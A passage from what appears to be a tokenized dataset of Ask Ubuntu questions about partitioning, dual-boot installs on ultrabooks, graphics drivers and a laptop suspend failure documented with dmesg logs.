? or is it enough to recreate the array ?
263832	how to create partitions in ubuntu after installation ?	i installed ubuntu 12.04 with no partitions . system created : /dev/sda1 ext4 with 228gb /dev/sda2 ; extended with 4gb /dev/sda5 ; linux swap with 4gb i 'm using gparted to make a partition in the 228gb ( where ubuntu is ) . however , it does n't allow me to create further partitions . how do i create further partitions ?
263834	ipsec & cypharing algorithm linux ubuntu	what is the package that contain the implementation of ipsec and what is the package that contain the implementation of cypher algorithms that ipsec uses for enctiption ?
263835	how do i stop thunderbird from checking for new messages at startup ?	i have recently switched to the habit of checking my email only twice a day -- one hour after i come to the office and one hour before i leave . each time i have processed any received messages i close thunderbird . in between those occasions i sometimes want to reread a message or access an attachment and then i do n't want thunderbird to show me any new messages upon startup . i have unchecked : check for new messages at startup check for new messages every n minutes and ( in the advanced section ) : use idle command if the server supports it still when thunderbird starts it checks for new messages . is there a way to disable this imap synchronization ?
263837	xubuntu 12.10 : ca n't add account to network application	when i try to add an account to gwibber/pidgin ( which are not system apps ) , it sends me to the `` system parameters '' . it is impossible for me to add account to this apps . any idea where it can come from ? example of window shown when `` add account '' is clicked :
263839	is there a way to dual boot windows 7 and ubuntu in a lenovo ultrabook ( without loosing the ssd cache ) ?	i have seen many people trying to install ubuntu on laptops like the lenovo u410 and fail . sometimes , we have to give up the ssd cache . have the developers solved it now ? can we install ubuntu on an ultrabook like u410 without loosing the ssd cache ? links to the issue : http : //forums.lenovo.com/t5/ideapad-y-u-v-z-and-p-series/lenovo-u410- can not -access-to-bios/td-p/877703/page/2 http : //forums.lenovo.com/t5/linux-discussion/installing-ubuntu-12-04-on-ultrabook-u410/td-p/871873 http : //ubuntuforums.org/showthread.php ? t=2023374 here 's one problem : i recently bought a u410 ultrabook . with the factory settings , the ubuntu installer does not detect any disks on the system . the problem is known and has something to do with the ssd , intel smart response technology and the disks ' raid configuration ( see unable to install 12.04 on a lenovo u410 ultrabook and http : //ubuntuforums.org/showthread.php ? t=1825132 ) is there a way around this problem without having to remove the existing windows installation ? also in case not , does my warranty get void if i remove the pre-loaded windows installation ? an ubuntu system is essential for me so i need to get it installed somehow . would appreciate some pointers . the only solution is to disable ssd cache and install windows to ssd ( i do n't think 24gb will be enough ) : disabe raid ( select achi in bios ) install windows to ssd . move user data and pagefile to hdd . disable file indexing on ssd . install most not system programs to hdd to economy free space . it will be even faster than cache , but you need to install big programs and games on d : . not every man can do it . thats why they use cache as default . boot ubuntu from cd , type in terminal `` sudo apt-get remove dmraid '' install ubuntu as usual if grub doesnt appear ( it is because of uefi ) use boot-repair utility as described here https : //help.ubuntu.com/community/boot-repair if grub appears , but ubuntu does n't boot , then you need to break dmraid utility : 7.1 boot ubuntu from cd 7.2 type in terminal `` sudo apt-get remove dmraid '' 7.3 open `` computer '' on the desktop and open the disk where you have installed ubuntu . on the top of the window will be some letters like 7bgetgu4uf87wch7wir6 . type in terminal `` sudo rm /media/ { your partition } /sbin/dmraid '' where you replace { your partition } with this letters 7.4 `` sudo touch /media/ { your partition } /sbin/dmraid '' and `` sudo chmod +x /media/ { your partition } /sbin/dmraid '' once you have booted ubuntu , remove dmraid in normal way ( using apt-get ) and the easy way is to install ubuntu with wubi . i tried it on achi , but there was no problems with dmraid and grub here 's another problem : so i bought a lenovo u410 the other day to use with linux along side my windows pc , problem is when i get to the installation screen the hard drives dont show up ( 500gb hdd or 32gb ssd ) i also took off acceleration and put the hard drives in non raid mode but that still didnt work , i also tried wubi to see if it would run for kicks but that wont work either , can anyone help me out ?
263840	confused about which graphics driver is loaded	using ubuntu 12.10 , and i have 2 graphics card , intel and ati , and i finally get proprietary ati driver to work -version 13.1- , but when i check lshw and lsmod , i get confused . here 's the output of lshw -the confusing part is the driver property- : *-display description : vga compatible controller product : cape verde [ radeon hd 7700m series ] ... configuration : driver=fglrx_pci latency=0 ... *-display description : vga compatible controller product : 3rd gen core processor graphics controller ... configuration : driver=i915 latency=0 ... and here 's lsmod output : lsmod | grep radeon > returns nothing after i installed the ati driver lsmod | grep fglrx fglrx 5196783 116 lsmod | grep video video 19335 1 i915 i expected the video value to be fglrx_pci or fglrx not i915 , am i missing something here ?
263845	bios unable to find ubuntu 64bit cd , with 32bit installed already	my friend and i are having a problem , where his pc wo n't find ubuntu 64bit cd , after having installed 32 bit already by accident . he gets a bios message saying `` media test failed . check cable '' and afterwards tells us `` unable to find os '' , and then it goes to boot ubuntu 32bit . when i 'm putting the cd in my pc , it boots fine , to the install screen . packard bell easynote lm : amd phenom ii x2 n660 6gb ddr3 ram 640 gb hdd .
263848	issues with apps requiring online integration	i 'm new to ubuntu and i 'm trying it out for the first time ( quantal quetzal ) . i was trying out the google contacts lens and nuvola player ( for google play music ) and i 'm getting the following error : unable to load page problem occurred while loading the url https : //accounts.google.com/o/oauth2/auth ? scope=https % 3a % 2f % 2fwww.google.com % 2fm8 % 2ffeeds & redirect_uri=http % 3a % 2f % 2flocalhost & response_type=code & client_id=666398043069.apps.googleusercontent.com can not resolve hostname ( accounts.google.com ) could you help me out with this please ?
263849	info bootstrapping environment : error no matching node is available	is there a logic that maas server could not work well with juju ? after creating the node and adding to maas . we could see the node passing to the ready status..but ! ! , juju bootstrap never works pretending something like : info bootstrapping environment 'maas ' ( origin : ppa type : maas ) ... error no matching node is available . no matching node is available ? ? ? what should juju knows to make this node available for it ? ? ? ? it s running , ready in maas and env file is well defined with maas keys ... ? ? ? ?
263853	how to change the soundcard output on-the-fly ?	one feature i miss the most in windows 7 , is the possibility to change the soundcard output on-the-fly . in xubuntu 12.10 , i have to unplug my headphones to make the sound come out of the speakers . is there a way to have a similar software level soundcard output switch with xubuntu as with windows 7 ?
263855	kubuntu trackpad multifinger gesture support	i was wondering if there 's a way to enable multi finger gesture support in kubuntu 12.10 . i specifically would like to quickly be able to change desktop or minimise apps . other functionality would be great too - i guess i like the osx way of doing it .
263857	unable to install ubuntu 12.10 on the integrated ssd of an asus ux32a	as the title suggests , i am trying to install ubuntu 12.10 on the 24gb integrated ssd of an asus ux32a . i took into consideration this answer - how to boot ubuntu from ssd drive which can not be selected as boot device ? - and basically these are the steps that i followed : deleted the info from the ssd converted the ssd to mbr created a small partition for /boot on the main hdd ( ~200 mb ) selected from bios the ssd as the primary boot partition when the installation began , i created on the ssd a partition for / and one for swap although the ssd theoretically was mbr , it complained about not having a bios boot partition , so i also created one for the bios-grub . everything worked fine , except for the fact that after the restart , the system did not recognize the ssd anymore and i was unable to select it as the main boot device . furthermore , if i use diskpart , it shows that the ssd is gpt , and not mbr , although i initially converted it to mbr . do you have any idea on how could i fix this ?
263859	error : the bumblebee daemon has not been started	i saw that there are some posts about that , but any of them i can find the solution to fix mine . i have a sony vaio vpcz11c5e with ubuntu 11.10 . graphics : nvidia geforce gt 330m intel graphics i followed bumblebee on wiki.ubuntu.com but when i run : sudo optirun glxspheres i get : [ 3399.786675 ] [ error ] the bumblebee daemon has not been started yet or the socket path /var/run/bumblebee.socket was incorrect . [ 3399.786711 ] [ error ] could not connect to bumblebee daemon - is it running ? i tried to follow all the other posts but i could not get with the error . i am kind of ubuntu new player , so if you need to know the kernel version or something like this , specify the command so we could go faster please . error message on more /var/log/syslog | grep bumblebeed mar 4 20:50:39 xinxi-vpcz11c5e bumblebeed [ 4187 ] : module bbswitch could not be loaded ( timeout ? ) mar 4 20:50:39 xinxi-vpcz11c5e bumblebeed [ 4187 ] : no switching method available . the dedicated card will always be on . mar 4 20:50:39 xinxi-vpcz11c5e bumblebeed [ 4187 ] : invalid configuration : no driver configured .
263862	what is the fundamental gui library for ubuntu starting with 12.04 ?	i have started exploring deeply into doing development for the ubuntu phone . in the past , and having used stock ubuntu , i always found that gtk was the standard gui library . but now , with the phone development , i 'm starting to see qml being the one that they encourage , and this uses qt . so , which is the standard ? has it changed ? how many of my applications are written in gtk and how many are actually in qt with good theme ?
263867	ubuntu suspend works only once through lid close	my system is asus n56vj . the suspend feature works the first time if i sudpend by closing the lid/or specifically selecting to suspend form the settings menu ( top right gear button ) .lateron it just does not suspend.. secondly if i press the hardware power button and choose to suspend from the poped up menu , i can suspend as many times i want.. same is the case if i suspend using sudo pm-sudpend it suspends everytime . the difference in the way suspend happens can be juged by the output of acpi_listen while suspending using the above different options . i have logged the acpi_listen optput as : 1. button/power pwrf 00000080 00000001 @ @ @ @ success ( using power button ) 2. button/power pwrf 00000080 00000002 @ @ @ @ success ( using power button ) 3. button/lid lid 00000080 00000001 @ @ @ @ success first time ! ( closing the lid ) video gfx0 00000080 00000000 @ @ @ @ comes up when lid is opened 4. button/lid lid 00000080 00000002 @ @ @ @ failure ! video gfx0 00000080 00000000 @ @ @ @ comes automatically as suspend fails button/lid lid 00000080 00000003 @ @ @ @ and this follows immediatelly ( not sure why this comes two times ) video gfx0 00000080 00000000 @ @ @ @ and this too . 5. button/power pwrf 00000080 00000003 @ @ @ @ failure ! now suspend from power button fails too until reboot 6. button/power pwrf 00000080 00000004 @ @ @ @ again failure ! now suspend from power button fails too until reboot the complete dmesg log is attached with the important messages posted here synced with above 6 attempts to suspend : 1 ) using power button success [ 571.919159 ] systemd-logind [ 2562 ] : execute_shutdown_or_sleep : failed to call org.freedesktop.systemd1 , using fallback : unknown unit : suspend.target [ 571.919171 ] systemd-logind [ 2562 ] : execute_shutdown_or_sleep_fallback : running command '/usr/sbin/pm-suspend ' for unit suspend.target [ 571.991180 ] thinkpad_ec : no thinkpad embedded controller ! [ 572.055734 ] alx 0000:04:00.0 eth0 : wolopts = 0 [ 572.055744 ] alx 0000:04:00.0 eth0 : wol-ctrl=0 [ 572.133063 ] init : anacron main process ( 3643 ) killed by term signal [ 572.226866 ] pm : syncing filesystems ... done . [ 572.288292 ] freezing user space processes ... ( elapsed 0.01 seconds ) done . [ 572.303877 ] freezing remaining freezable tasks ... ( elapsed 0.01 seconds ) done . [ 572.320090 ] suspending console ( s ) ( use no_console_suspend to debug ) [ 572.327601 ] sd 2:0:0:0 : [ sdb ] synchronizing scsi cache [ 572.327677 ] sd 2:0:0:0 : [ sdb ] stopping disk [ 572.327797 ] sd 0:0:0:0 : [ sda ] synchronizing scsi cache [ 572.327877 ] sd 0:0:0:0 : [ sda ] stopping disk [ 572.346136 ] nouveau [ drm ] suspending fbcon ... [ 572.346139 ] nouveau [ drm ] suspending display ... [ 572.346146 ] nouveau [ drm ] unpinning framebuffer ( s ) ... [ 572.346268 ] nouveau [ drm ] evicting buffers ... @ @ @ @ button/power pwrf 00000080 00000001 success [ 572.352651 ] nouveau [ drm ] suspending client object trees ... [ 572.994632 ] acpi : can not transition to non-d0 state from d3 [ 573.362177 ] pm : suspend of devices complete after 1043.529 msecs [ 573.362293 ] pm : late suspend of devices complete after 0.115 msecs [ 573.378190 ] ehci-pci 0000:00:1d.0 : system wakeup enabled by acpi [ 573.394087 ] ehci-pci 0000:00:1a.0 : system wakeup enabled by acpi [ 573.426046 ] pm : noirq suspend of devices complete after 63.844 msecs [ 573.426324 ] acpi : preparing to enter system sleep state s3 [ 573.542073 ] pm : saving platform nvs memory [ 573.591976 ] disabling non-boot cpus ... [ 573.693576 ] smpboot : cpu 1 is now offline [ 573.797410 ] smpboot : cpu 2 is now offline [ 573.901256 ] smpboot : cpu 3 is now offline [ 574.005102 ] smpboot : cpu 4 is now offline [ 574.108944 ] smpboot : cpu 5 is now offline [ 574.109381 ] broke affinity for irq 16 [ 574.109398 ] broke affinity for irq 23 [ 574.212790 ] smpboot : cpu 6 is now offline [ 574.213186 ] broke affinity for irq 17 [ 574.316634 ] smpboot : cpu 7 is now offline [ 574.316959 ] extended cmos year : 2000 [ 574.318088 ] acpi : low-level resume complete 2 ) using power button success [ 584.303427 ] systemd-logind [ 2562 ] : execute_shutdown_or_sleep : failed to call org.freedesktop.systemd1 , using fallback : unknown unit : suspend.target [ 584.303440 ] systemd-logind [ 2562 ] : execute_shutdown_or_sleep_fallback : running command '/usr/sbin/pm-suspend ' for unit suspend.target [ 584.423757 ] thinkpad_ec : no thinkpad embedded controller ! [ 584.507374 ] alx 0000:04:00.0 eth0 : wolopts = 0 [ 584.507382 ] alx 0000:04:00.0 eth0 : wol-ctrl=0 [ 584.589690 ] init : anacron main process ( 4182 ) killed by term signal [ 584.632872 ] pm : syncing filesystems ... done . [ 584.724279 ] freezing user space processes ... ( elapsed 0.01 seconds ) done . [ 584.740073 ] freezing remaining freezable tasks ... ( elapsed 0.01 seconds ) done . [ 584.756286 ] suspending console ( s ) ( use no_console_suspend to debug ) [ 584.763627 ] sd 2:0:0:0 : [ sdb ] synchronizing scsi cache [ 584.763669 ] sd 0:0:0:0 : [ sda ] synchronizing scsi cache [ 584.763733 ] sd 0:0:0:0 : [ sda ] stopping disk [ 584.782901 ] nouveau [ drm ] suspending fbcon ... [ 584.782904 ] nouveau [ drm ] suspending display ... [ 584.782910 ] nouveau [ drm ] unpinning framebuffer ( s ) ... [ 584.782993 ] nouveau [ drm ] evicting buffers ... @ @ @ @ button/power pwrf 00000080 00000002 success [ 584.783572 ] nouveau [ drm ] suspending client object trees ... [ 584.871706 ] sd 2:0:0:0 : [ sdb ] stopping disk [ 585.414888 ] nouveau 0000:01:00.0 : power state changed by acpi to d3hot [ 585.906247 ] pm : suspend of devices complete after 1151.563 msecs [ 585.906374 ] pm : late suspend of devices complete after 0.125 msecs [ 585.922217 ] ehci-pci 0000:00:1d.0 : system wakeup enabled by acpi [ 585.938277 ] ehci-pci 0000:00:1a.0 : system wakeup enabled by acpi [ 585.970095 ] pm : noirq suspend of devices complete after 63.814 msecs [ 585.970349 ] acpi : preparing to enter system sleep state s3 [ 586.106052 ] pm : saving platform nvs memory [ 586.159958 ] disabling non-boot cpus ... [ 586.261555 ] smpboot : cpu 1 is now offline [ 586.365404 ] smpboot : cpu 2 is now offline [ 586.469246 ] smpboot : cpu 3 is now offline [ 586.573091 ] smpboot : cpu 4 is now offline [ 586.676938 ] smpboot : cpu 5 is now offline [ 586.677314 ] broke affinity for irq 16 [ 586.677331 ] broke affinity for irq 23 [ 586.780778 ] smpboot : cpu 6 is now offline [ 586.781184 ] broke affinity for irq 17 [ 586.884624 ] smpboot : cpu 7 is now offline [ 586.884915 ] extended cmos year : 2000 [ 586.886032 ] acpi : low-level resume complete 3 ) closing lid the first time success [ 602.205758 ] wlan0 : deauthenticating from 00:1e:40 : f1:9b:07 by local choice ( reason=3 ) [ 602.218589 ] cfg80211 : calling crda to update world regulatory domain [ 602.228761 ] cfg80211 : world regulatory domain updated : [ 602.228768 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 602.228771 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 602.228774 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 602.228777 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 602.228779 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 602.228782 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 603.122041 ] thinkpad_ec : no thinkpad embedded controller ! [ 603.187242 ] alx 0000:04:00.0 eth0 : wolopts = 0 [ 603.187253 ] alx 0000:04:00.0 eth0 : wol-ctrl=0 [ 603.262392 ] init : anacron main process ( 4734 ) killed by term signal [ 603.755180 ] pm : syncing filesystems ... done . [ 603.826503 ] freezing user space processes ... ( elapsed 0.01 seconds ) done . [ 603.842341 ] freezing remaining freezable tasks ... ( elapsed 0.01 seconds ) done . [ 603.858571 ] suspending console ( s ) ( use no_console_suspend to debug ) [ 603.858861 ] sd 2:0:0:0 : [ sdb ] synchronizing scsi cache [ 603.858890 ] sd 0:0:0:0 : [ sda ] synchronizing scsi cache [ 603.858917 ] sd 2:0:0:0 : [ sdb ] stopping disk [ 603.858939 ] sd 0:0:0:0 : [ sda ] stopping disk [ 603.877540 ] nouveau [ drm ] suspending fbcon ... [ 603.877543 ] nouveau [ drm ] suspending display ... [ 603.877550 ] nouveau [ drm ] unpinning framebuffer ( s ) ... [ 603.877651 ] nouveau [ drm ] evicting buffers ... @ @ @ @ button/lid lid 00000080 00000001 success first time ! [ 603.878552 ] nouveau [ drm ] suspending client object trees ... @ @ @ @ video gfx0 00000080 00000000 this comes when lid is opened . [ 604.509166 ] nouveau 0000:01:00.0 : power state changed by acpi to d3hot [ 604.900677 ] pm : suspend of devices complete after 1043.548 msecs [ 604.900802 ] pm : late suspend of devices complete after 0.124 msecs [ 604.916647 ] ehci-pci 0000:00:1d.0 : system wakeup enabled by acpi [ 604.932704 ] ehci-pci 0000:00:1a.0 : system wakeup enabled by acpi [ 604.964522 ] pm : noirq suspend of devices complete after 63.813 msecs [ 604.964776 ] acpi : preparing to enter system sleep state s3 [ 605.092497 ] pm : saving platform nvs memory [ 605.148262 ] disabling non-boot cpus ... [ 605.251990 ] smpboot : cpu 1 is now offline [ 605.355838 ] smpboot : cpu 2 is now offline [ 605.459678 ] smpboot : cpu 3 is now offline [ 605.563528 ] smpboot : cpu 4 is now offline [ 605.563896 ] nohz : local_softirq_pending 02 [ 605.667372 ] smpboot : cpu 5 is now offline [ 605.667742 ] broke affinity for irq 16 [ 605.667758 ] broke affinity for irq 23 [ 605.771214 ] smpboot : cpu 6 is now offline [ 605.771653 ] broke affinity for irq 17 [ 605.771663 ] broke affinity for irq 41 [ 605.875059 ] smpboot : cpu 7 is now offline [ 605.875387 ] extended cmos year : 2000 [ 605.876506 ] acpi : low-level resume complete 4 ) closing lid the second time , failure ! [ 628.733794 ] wlan0 : deauthenticating from 00:1e:40 : f1:9b:07 by local choice ( reason=3 ) [ 628.756062 ] cfg80211 : calling crda to update world regulatory domain [ 628.766261 ] cfg80211 : world regulatory domain updated : [ 628.766267 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 628.766270 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 628.766273 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 628.766275 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 628.766278 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 628.766280 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 629.644794 ] thinkpad_ec : no thinkpad embedded controller ! [ 629.774430 ] init : anacron main process ( 5394 ) killed by term signal [ 630.270388 ] pm : syncing filesystems ... done . [ 630.709167 ] freezing user space processes ... ( elapsed 0.03 seconds ) done . [ 630.740952 ] freezing remaining freezable tasks ... ( elapsed 0.01 seconds ) done . [ 630.757167 ] suspending console ( s ) ( use no_console_suspend to debug ) [ 630.757446 ] sd 2:0:0:0 : [ sdb ] synchronizing scsi cache [ 630.757473 ] sd 0:0:0:0 : [ sda ] synchronizing scsi cache [ 630.757536 ] sd 2:0:0:0 : [ sdb ] stopping disk [ 630.757542 ] sd 0:0:0:0 : [ sda ] stopping disk [ 630.776492 ] nouveau [ drm ] suspending fbcon ... [ 630.776495 ] nouveau [ drm ] suspending display ... [ 630.776505 ] nouveau [ drm ] unpinning framebuffer ( s ) ... [ 630.776586 ] nouveau [ drm ] evicting buffers ... @ @ @ @ button/lid lid 00000080 00000002 failure ! [ 630.777114 ] alx 0000:04:00.0 : phy spd/dplx unresolved : ffff @ @ @ @ video gfx0 00000080 00000000 comes automatically as suspend fails [ 630.777116 ] alx 0000:04:00.0 eth0 : shutown err ( ffffffea ) @ @ @ @ button/lid lid 00000080 00000003 and this follows immediatelly [ 630.777117 ] alx 0000:04:00.0 : shutdown fail in suspend -5 @ @ @ @ video gfx0 00000080 00000000 and this too . [ 630.777129 ] pci_pm_suspend ( ) : alx_suspend+0x0/0x90 [ alx ] returns -5 [ 630.777132 ] dpm_run_callback ( ) : pci_pm_suspend+0x0/0x140 returns -5 [ 630.777134 ] pm : device 0000:04:00.0 failed to suspend async : error -5 [ 630.777159 ] nouveau [ drm ] suspending client object trees ... [ 631.407447 ] nouveau 0000:01:00.0 : power state changed by acpi to d3hot [ 631.819647 ] pm : some devices failed to suspend [ 631.819756 ] mei 0000:00:16.0 : irq 42 for msi/msi-x [ 631.819834 ] sd 0:0:0:0 : [ sda ] starting disk [ 631.819835 ] sd 2:0:0:0 : [ sdb ] starting disk [ 631.819859 ] nouveau 0000:01:00.0 : power state changed by acpi to d0 [ 631.834608 ] nouveau [ drm ] re-enabling device ... [ 631.834631 ] nouveau [ drm ] resuming client object trees ... [ 631.834635 ] nouveau [ vbios ] [ 0000:01:00.0 ] running init tables [ 631.834653 ] i915 0000:00:02.0 : setting latency timer to 64 [ 631.834675 ] snd_hda_intel 0000:00:1b.0 : irq 44 for msi/msi-x [ 631.961131 ] nouveau [ drm ] resuming display ... [ 633.231816 ] pm : resume of devices complete after 1414.976 msecs [ 633.232032 ] restarting tasks ... done . [ 633.247959 ] video lnxvideo:00 : restoring backlight state [ 633.247962 ] video lnxvideo:01 : restoring backlight state [ 633.607031 ] [ drm ] enabling rc6 states : rc6 on , rc6p on , rc6pp off [ 633.730762 ] init : anacron main process ( 5644 ) killed by term signal [ 633.789826 ] thinkpad_ec : no thinkpad embedded controller ! [ 633.933085 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 635.963373 ] wlan0 : authenticate with 00:1e:40 : f1:9b:07 [ 635.967378 ] wlan0 : capabilities/regulatory prevented using ap ht/vht configuration , downgraded [ 635.967476 ] wlan0 : send auth to 00:1e:40 : f1:9b:07 ( try 1/3 ) [ 635.969645 ] wlan0 : authenticated [ 635.969866 ] ath9k 0000:03:00.0 wlan0 : disabling ht/vht due to wep/tkip use [ 635.969875 ] ath9k 0000:03:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 635.969880 ] ath9k 0000:03:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 635.970308 ] wlan0 : associate with 00:1e:40 : f1:9b:07 ( try 1/3 ) [ 635.973042 ] wlan0 : rx assocresp from 00:1e:40 : f1:9b:07 ( capab=0x411 status=0 aid=1 ) [ 635.973102 ] wlan0 : associated [ 635.973115 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready 5 ) again using power button , failure from now on [ 692.762199 ] systemd-logind [ 2562 ] : execute_shutdown_or_sleep : failed to call org.freedesktop.systemd1 , using fallback : unknown unit : suspend.target [ 692.762212 ] systemd-logind [ 2562 ] : execute_shutdown_or_sleep_fallback : running command '/usr/sbin/pm-suspend ' for unit suspend.target [ 692.884566 ] thinkpad_ec : no thinkpad embedded controller ! [ 692.997459 ] init : anacron main process ( 6011 ) killed by term signal [ 693.265267 ] pm : syncing filesystems ... done . [ 693.364485 ] freezing user space processes ... ( elapsed 0.01 seconds ) done . [ 693.380198 ] freezing remaining freezable tasks ... ( elapsed 0.01 seconds ) done . [ 693.396500 ] suspending console ( s ) ( use no_console_suspend to debug ) [ 693.403715 ] sd 2:0:0:0 : [ sdb ] synchronizing scsi cache [ 693.403725 ] sd 0:0:0:0 : [ sda ] synchronizing scsi cache [ 693.403810 ] sd 0:0:0:0 : [ sda ] stopping disk [ 693.403816 ] sd 2:0:0:0 : [ sdb ] stopping disk [ 693.423382 ] nouveau [ drm ] suspending fbcon ... [ 693.423385 ] nouveau [ drm ] suspending display ... [ 693.423393 ] nouveau [ drm ] unpinning framebuffer ( s ) ... [ 693.423515 ] nouveau [ drm ] evicting buffers ... @ @ @ @ button/power pwrf 00000080 00000003 failure now suspend from power button fails too until reboot [ 693.423995 ] alx 0000:04:00.0 : phy spd/dplx unresolved : ffff [ 693.423997 ] alx 0000:04:00.0 eth0 : shutown err ( ffffffea ) [ 693.423997 ] alx 0000:04:00.0 : shutdown fail in suspend -5 [ 693.424009 ] pci_pm_suspend ( ) : alx_suspend+0x0/0x90 [ alx ] returns -5 [ 693.424012 ] dpm_run_callback ( ) : pci_pm_suspend+0x0/0x140 returns -5 [ 693.424014 ] pm : device 0000:04:00.0 failed to suspend async : error -5 [ 693.424162 ] nouveau [ drm ] suspending client object trees ... [ 694.050776 ] nouveau 0000:01:00.0 : power state changed by acpi to d3hot [ 694.416394 ] pm : some devices failed to suspend [ 694.416486 ] mei 0000:00:16.0 : irq 42 for msi/msi-x [ 694.416565 ] sd 0:0:0:0 : [ sda ] starting disk [ 694.416567 ] sd 2:0:0:0 : [ sdb ] starting disk [ 694.416568 ] nouveau 0000:01:00.0 : power state changed by acpi to d0 [ 694.430148 ] nouveau [ drm ] re-enabling device ... [ 694.430174 ] nouveau [ drm ] resuming client object trees ... [ 694.430177 ] nouveau [ vbios ] [ 0000:01:00.0 ] running init tables [ 694.430180 ] i915 0000:00:02.0 : setting latency timer to 64 [ 694.430241 ] snd_hda_intel 0000:00:1b.0 : irq 44 for msi/msi-x [ 694.487664 ] extended cmos year : 2000 [ 694.556953 ] nouveau [ drm ] resuming display ... [ 695.495880 ] [ drm ] enabling rc6 states : rc6 on , rc6p on , rc6pp off [ 695.844630 ] pm : resume of devices complete after 1431.073 msecs [ 695.844881 ] restarting tasks ... done . [ 695.859473 ] video lnxvideo:00 : restoring backlight state [ 695.859477 ] video lnxvideo:01 : restoring backlight state [ 696.041741 ] init : anacron main process ( 6265 ) killed by term signal [ 696.085882 ] thinkpad_ec : no thinkpad embedded controller ! 6 ) again using power button failure continues ! [ 701.427151 ] systemd-logind [ 2562 ] : execute_shutdown_or_sleep : failed to call org.freedesktop.systemd1 , using fallback : unknown unit : suspend.target [ 701.427164 ] systemd-logind [ 2562 ] : execute_shutdown_or_sleep_fallback : running command '/usr/sbin/pm-suspend ' for unit suspend.target [ 701.563159 ] thinkpad_ec : no thinkpad embedded controller ! [ 701.703776 ] init : anacron main process ( 6461 ) killed by term signal [ 701.747261 ] pm : syncing filesystems ... done . [ 701.807565 ] freezing user space processes ... ( elapsed 0.01 seconds ) done . [ 701.823449 ] freezing remaining freezable tasks ... ( elapsed 0.01 seconds ) done . [ 701.839658 ] suspending console ( s ) ( use no_console_suspend to debug ) [ 701.848980 ] sd 2:0:0:0 : [ sdb ] synchronizing scsi cache [ 701.848998 ] sd 0:0:0:0 : [ sda ] synchronizing scsi cache [ 701.849061 ] sd 0:0:0:0 : [ sda ] stopping disk [ 701.867981 ] nouveau [ drm ] suspending fbcon ... [ 701.867990 ] nouveau [ drm ] suspending display ... [ 701.868001 ] nouveau [ drm ] unpinning framebuffer ( s ) ... [ 701.868084 ] nouveau [ drm ] evicting buffers ... @ @ @ @ button/power pwrf 00000080 00000004 failure now suspend from power button fails too until reboot [ 701.868611 ] alx 0000:04:00.0 : phy spd/dplx unresolved : ffff [ 701.868612 ] alx 0000:04:00.0 eth0 : shutown err ( ffffffea ) [ 701.868613 ] alx 0000:04:00.0 : shutdown fail in suspend -5 [ 701.868626 ] pci_pm_suspend ( ) : alx_suspend+0x0/0x90 [ alx ] returns -5 [ 701.868629 ] dpm_run_callback ( ) : pci_pm_suspend+0x0/0x140 returns -5 [ 701.868632 ] pm : device 0000:04:00.0 failed to suspend async : error -5 [ 701.868636 ] nouveau [ drm ] suspending client object trees ... [ 701.918459 ] sd 2:0:0:0 : [ sdb ] stopping disk [ 702.497965 ] nouveau 0000:01:00.0 : power state changed by acpi to d3hot [ 702.934403 ] pm : some devices failed to suspend [ 702.934535 ] mei 0000:00:16.0 : irq 42 for msi/msi-x [ 702.934604 ] nouveau 0000:01:00.0 : power state changed by acpi to d0 [ 702.934605 ] sd 2:0:0:0 : [ sdb ] starting disk [ 702.934606 ] sd 0:0:0:0 : [ sda ] starting disk [ 702.949041 ] nouveau [ drm ] re-enabling device ... [ 702.949070 ] nouveau [ drm ] resuming client object trees ... [ 702.949074 ] nouveau [ vbios ] [ 0000:01:00.0 ] running init tables [ 702.949173 ] i915 0000:00:02.0 : setting latency timer to 64 [ 702.949203 ] snd_hda_intel 0000:00:1b.0 : irq 44 for msi/msi-x [ 703.075739 ] nouveau [ drm ] resuming display ... [ 704.384265 ] pm : resume of devices complete after 1452.746 msecs [ 704.384483 ] restarting tasks ... done . [ 704.402378 ] video lnxvideo:00 : restoring backlight state [ 704.402382 ] video lnxvideo:01 : restoring backlight state [ 704.465993 ] [ drm ] enabling rc6 states : rc6 on , rc6p on , rc6pp off [ 704.551039 ] init : anacron main process ( 6712 ) killed by term signal [ 704.597116 ] thinkpad_ec : no thinkpad embedded controller ! full dmesg log important points 1 ) what i can fetch out here is that when i use the power button to suspend from the popped up menu , the command executed to suspend is execute_shutdown_or_sleep while closing from the lid im not sure what command gets executed for sleep from the above logs . secondly , i am only prompted for a password on waking up when i do that by closing the lid/or selecting suspend from the power menu in top right corner , and not when i do it using sudo pm-suspend or by using the suspend option in popped up menu on pressing h/w power button.maybe this is important ? thanks . few more inputs.. 1 ) my machine info asus n56vj 2 ) output for cat /proc/acpi/wakeup device s-state status sysfs node p0p1 s4 *disabled peg0 s4 *disabled pci:0000:00:01.0 peg1 s4 *disabled peg2 s4 *disabled peg3 s4 *disabled xhc1 s3 *disabled ehc1 s3 *enabled pci:0000:00:1d.0 usb1 s3 *disabled usb2 s3 *disabled usb3 s3 *disabled usb4 s3 *disabled ehc2 s3 *enabled pci:0000:00:1a.0 usb5 s3 *disabled usb6 s3 *disabled usb7 s3 *disabled hdef s4 *disabled pci:0000:00:1b.0 rp03 s4 *disabled rp05 s4 *disabled rp06 s4 *disabled rp07 s4 *disabled rp08 s4 *disabled wlan s3 